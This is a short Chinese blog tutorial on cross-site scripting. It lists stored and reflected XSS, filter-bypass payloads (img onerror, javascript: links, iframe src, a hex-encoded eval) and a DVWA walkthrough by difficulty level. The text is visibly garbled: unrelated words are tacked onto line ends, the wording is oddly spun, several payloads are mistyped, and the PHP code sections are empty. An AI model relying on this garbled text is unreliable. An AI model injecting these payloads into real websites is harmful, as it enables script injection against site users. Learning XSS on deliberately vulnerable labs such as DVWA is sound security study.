Xss漏洞javascript
Xss漏洞出如今1996年。Xss漏洞又名跨站脚本漏洞html
Xss可能形成的危害java
Xss分类web
1.储存型xssxss
2.反弹型xss网站
攻击spa
注意:当xss攻击执行不成功的时候,得想办法判断他为何不成功3d
是被过滤掉了呢,仍是没有闭合对应的标签。htm
<script>alert(‘xss’)</script>blog
0×04 过滤的解决办法
假如说网站禁止过滤了script 这时该怎么办呢,记住一句话,这是我总结出来的“xss就是在页面执行你想要的js”不用管那么多,只要能运行咱们的js就OK,好比用img标签或者a标签。咱们能够这样写
<img scr=1 onerror=alert('xss')>当找不到图片名为1的文件时,执行alert('xss')<a href=javascrip:alert('xss')>s</a> 点击s时运行alert('xss')<iframe src=javascript:alert('xss');height=0 width=0 /><iframe>利用iframe的scr来弹窗<img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>过滤了alert来执行弹窗
经常使用的攻击标签:img、iframe,script,div,style,input,a,math,title等等
Xss过滤表:http://www.freebuf.com/articles/web/153055.html
Xss payload 大全:https://www.jianshu.com/p/3f16269c83db
新型的xss payload在推特关注:xss hack
Xss平台:
以DVWA作个例子,低级->不可能
级别:低级:
描述:无任何过滤
Payload:<script>alert(‘xss’)</script>
Php代码:
级别:中级
描述:把script标签过滤了
Payload:<img src=1 onerror=alert(/xss/)>,
Php代码:
级别:高级
描述:用正则过滤掉scrip
Payload:<img src=1 onerror=alert(/xss/)> 同样
Php代码:
不可能级别,把用户输入的实体化了,因此没有xss漏洞。